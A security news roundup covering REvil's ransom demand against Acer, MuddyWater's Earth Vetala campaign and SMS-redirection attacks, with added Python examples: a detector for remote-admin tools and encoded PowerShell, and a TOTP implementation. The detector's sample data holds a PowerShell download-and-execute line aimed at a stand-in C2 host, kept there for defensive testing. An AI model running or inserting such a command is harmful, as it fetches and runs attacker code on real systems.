The ransomware gang known as ‘REvil’ stole confidential files from computer giant Acer and demanded an unprecedented ransom of US$50 million. The group also posted online images of allegedly stolen spreadsheets, bank balances, and bank texts, in order to prove their claims of having hacked into the Taiwan company’s network.

According to security researchers, the attackers may have exploited a Microsoft Exchange vulnerability to get into the company's network. The $50 million demand is the largest publicly known ransom demand to date, Emsisoft threat analyst Brett Callow said, larger than the $42 million REvil wanted from celebrity law firm Grubman Shire Meiselas & Sacks, whose clients included Nicki Minaj, Mariah Carey and LeBron James. 

When asked about the situation, Acer would not confirm that it was a ransomware attack, telling BleepingComputer only that it had "reported recent abnormal situations observed to the relevant law enforcement and data protection authorities in multiple countries." Asked for further details, Acer replied, "there is an ongoing investigation and for the sake of security, we are unable to comment on details." 

According to The Record, Acer's name appeared on the REvil group's leak site, where the gang lists victims that refuse to pay. With the help of malware intelligence analyst Marcelo Rivero, The Record tracked down the gang's other dark web portal, which displayed the $50 million demand and the online chat the gang was using to negotiate with Acer's representatives.

Advanced Intel's Andariel cyber-intelligence platform had detected that the REvil gang recently targeted a Microsoft Exchange server on Acer's domain, which suggests the ProxyLogon vulnerabilities may have been the entry point used to deploy the ransomware, though this has not been confirmed.

Iranian Hacking Group Targets Several Middle East Companies Via Malicious Campaign


Security researchers at Trend Micro found evidence of malicious activity by the advanced persistent threat (APT) group 'MuddyWater', which has targeted Middle East organizations using the ScreenConnect remote management tool. 

Trend Micro tracks the actor behind the newly detected campaign as 'Earth Vetala'. The latest findings build on research published by Anomali last month. MuddyWater is an Iranian hacking group known primarily for attacks against Middle Eastern countries.

Key findings from this investigation 

The details discovered by security researchers are listed below:

• The campaign steals credentials from browsers (Chrome, Chromium, Firefox, Opera and Internet Explorer) and from Outlook. 

• The campaign uses spear-phishing emails with embedded links to a legitimate file-sharing service. 

• The goal of the lure is to deliver malicious packages that carry legitimate remote-administration tools (ScreenConnect and RemoteUtilities), giving the attackers remote control of enterprise systems. 

The researchers found a spear-phishing email purporting to come from a government agency. The emails direct victims to a .ZIP file containing legitimate remote-administration software from RemoteUtilities, which can download and upload files, capture screenshots, browse files and directories, and start and kill processes. 

Earth Vetala's post-exploitation activity involves password- and process-dumping tools and custom backdoors. The threat actors were observed initiating communications with a command-and-control (C2) server to execute obfuscated PowerShell scripts. 

Security researchers at Trend Micro said the targets of the new wave of attacks are mainly organizations in Bahrain, Israel, Azerbaijan, Saudi Arabia and the United Arab Emirates.

In one instance involving a compromised host in Saudi Arabia, the researchers found that the adversary unsuccessfully tried to configure SharpChisel, a C# wrapper for the TCP/UDP tunnelling tool chisel, for C2 communications, before installing a remote access tool, a credential stealer and a PowerShell backdoor capable of executing arbitrary remote commands.
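An added example, not code or indicators from Trend Micro: a Python check over constructed process-creation records for the two behaviours the report describes, a remote-administration tool appearing on an endpoint and PowerShell launched with an encoded (base64 of UTF-16LE) command, which the check decodes so an analyst sees the script rather than an opaque blob. The pipe-delimited record layout, the sample paths and the binary names attributed to RemoteUtilities and ScreenConnect are assumptions for the example; build your own allow-list from the installers you actually deploy.

```python
import base64
import os

# Process names assumed here to belong to the two products named in the
# report (not published IOCs): verify against your own software inventory.
REMOTE_ADMIN_BINARIES = {
    "rutserv.exe", "rfusclient.exe",                                    # RemoteUtilities
    "screenconnect.clientservice.exe", "screenconnect.windowsclient.exe",  # ScreenConnect
}
POWERSHELL_BINARIES = {"powershell.exe", "pwsh.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common ones.
ENCODED_FLAGS = {"-e", "-ec", "-enc", "-encodedcommand"}

# Constructed payload and records. The encoded form is computed here so the
# sample stays readable; in real telemetry only the base64 blob is visible.
PLAINTEXT = "IEX (New-Object Net.WebClient).DownloadString('http://c2.invalid/a.ps1')"
ENCODED = base64.b64encode(PLAINTEXT.encode("utf-16le")).decode()

# timestamp|image|parent image|command line  (made-up layout for the example)
SAMPLE_EVENTS = f"""
2021-03-01T09:12:44|C:\\Users\\u\\AppData\\Local\\Temp\\rutserv.exe|C:\\Windows\\explorer.exe|rutserv.exe
2021-03-01T09:13:10|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|C:\\Users\\u\\AppData\\Local\\Temp\\rutserv.exe|powershell.exe -nop -w hidden -enc {ENCODED}
2021-03-01T09:14:00|C:\\Windows\\System32\\notepad.exe|C:\\Windows\\explorer.exe|notepad.exe report.txt
2021-03-01T09:15:00|C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe|C:\\Windows\\explorer.exe|powershell.exe -File C:\\scripts\\backup.ps1
"""


def decode_encoded_powershell(image_name, cmdline):
    """If this is PowerShell run with an encoded command, return the decoded
    script; otherwise None. PowerShell expects base64 of UTF-16LE text."""
    if image_name not in POWERSHELL_BINARIES:
        return None
    tokens = cmdline.split()
    for i, tok in enumerate(tokens[:-1]):
        if tok.lower() in ENCODED_FLAGS:
            try:
                return base64.b64decode(tokens[i + 1], validate=True).decode("utf-16le")
            except (ValueError, UnicodeDecodeError):
                return None
    return None


def analyze_process_events(text):
    """Return one finding per suspicious record: a remote-admin binary
    starting, or PowerShell with a decoded encoded command."""
    findings = []
    for line in text.strip().splitlines():
        ts, image, parent, cmdline = line.split("|", 3)
        name = os.path.basename(image.replace("\\", "/")).lower()
        if name in REMOTE_ADMIN_BINARIES:
            findings.append({"ts": ts, "type": "remote_admin_tool", "image": image, "parent": parent})
        decoded = decode_encoded_powershell(name, cmdline)
        if decoded is not None:
            findings.append({"ts": ts, "type": "encoded_powershell", "parent": parent, "decoded": decoded})
    return findings


if __name__ == "__main__":
    for finding in analyze_process_events(SAMPLE_EVENTS):
        print(finding)
```

The parent of the PowerShell process is kept in each finding on purpose: PowerShell spawned by a freshly installed remote-administration tool, as in the second record, is far more telling than either event alone.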

In just $16, Hackers May Steal User Data Via SMS Attack


Smartphone users face a new privacy and security risk: commercial text-messaging services are being abused to silently redirect a victim's text messages to an attacker for as little as Rs 1,160 (about $16), handing criminals two-factor codes and any other SMS meant for the victim. The attack leaves no trace on the victim's phone and is possible because of lax controls at SMS-routing firms and in the telecom industry as a whole. 

New technology is developed every day to fight hackers and protect user data and privacy, yet this recently reported attack defeats the protection that SMS one-time passwords (OTPs) are supposed to give online transactions. It lets an attacker reroute the text messages addressed to the victim's phone number to systems under the attacker's control, using business-oriented SMS-management services as the vehicle. The attack is practical, at least in the United States, because of weak safeguards in the telecom industry, which makes the criminals' job easy. 

"The method of attack, which has not been previously reported or demonstrated in detail, has implications for cybercrime, where criminals often take over targets' phone numbers in order to harass them, drain their bank account, or otherwise tear through their digital lives," stated the report from Motherboard late on Monday, 15th of March. 

Joseph Cox, a reporter for Motherboard, had the attack run against his own phone number and noticed nothing on his phone. What is striking is that the service cost the hacker just $16 (Rs. 1,160). The company whose service was used in Cox's case said it had since fixed the issue, but the same cannot be said for several others. Some firms are aware of the attack, and CTIA, the wireless industry trade body, has also come in for blame. 

These services let the attacker not only intercept incoming texts but also reply to them. SMS redirection joins SIM swapping and SS7 attacks as a way to hijack a victim's messages, with one important difference: a SIM-swap victim often notices because the phone loses network service, whereas with SMS redirection the phone keeps working normally and nothing warns the user. 

It is therefore better not to rely on SMS for one-time codes. Users should switch to authenticator apps, and where a service offers only SMS or email delivery, prefer email, especially for bank-related OTPs. 

"It is better to use an app like Google Authenticator or Authy. Some password managers even have support for 2FA built-in, like 1Password or many of the other free managers we recommend," the report mentioned.
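The on-device code generation the report recommends, as an added example that is not code from the article or from any of the apps it names: a minimal RFC 6238 TOTP in Python, checked against the test vectors published in that RFC (the seed below is the RFC's ASCII test key, not a real secret). The code depends only on the shared secret and the clock, so there is no SMS leg for a redirect to capture. The function names and the skew window are assumptions for the example.

```python
import hashlib
import hmac
import struct
import time

# RFC 4226 / RFC 6238 test key (ASCII "12345678901234567890"); a real
# authenticator stores a per-user secret provisioned from the QR code.
SEED = b"12345678901234567890"


def hotp(secret, counter, digits=6, algo=hashlib.sha1):
    """RFC 4226 HMAC-based one-time password for an 8-byte big-endian counter."""
    mac = hmac.new(secret, struct.pack(">Q", counter), algo).digest()
    offset = mac[-1] & 0x0F                                     # dynamic truncation
    code = struct.unpack(">I", mac[offset:offset + 4])[0] & 0x7FFFFFFF
    return str(code % (10 ** digits)).zfill(digits)


def totp(secret, timestamp, digits=6, step=30, algo=hashlib.sha1):
    """RFC 6238: HOTP driven by the number of `step`-second periods since the epoch."""
    return hotp(secret, int(timestamp) // step, digits, algo)


def verify_totp(secret, code, timestamp=None, skew=1, **kw):
    """Server-side check. Accept the current period plus `skew` periods on
    either side to tolerate clock drift; compare in constant time."""
    timestamp = time.time() if timestamp is None else timestamp
    step = kw.get("step", 30)
    return any(
        hmac.compare_digest(totp(secret, timestamp + k * step, **kw), code)
        for k in range(-skew, skew + 1)
    )


if __name__ == "__main__":
    print("current code:", totp(SEED))
    print("RFC 6238 vector, T=59, 8 digits:", totp(SEED, 59, digits=8))   # 94287082
```

Two practical points the RFC leaves to the implementer: a server should remember the last counter value it accepted for a user and refuse a reused code, so an intercepted code cannot be replayed inside the skew window, and the secret must be stored with the same care as a password hash, since anyone holding it can generate codes indefinitely.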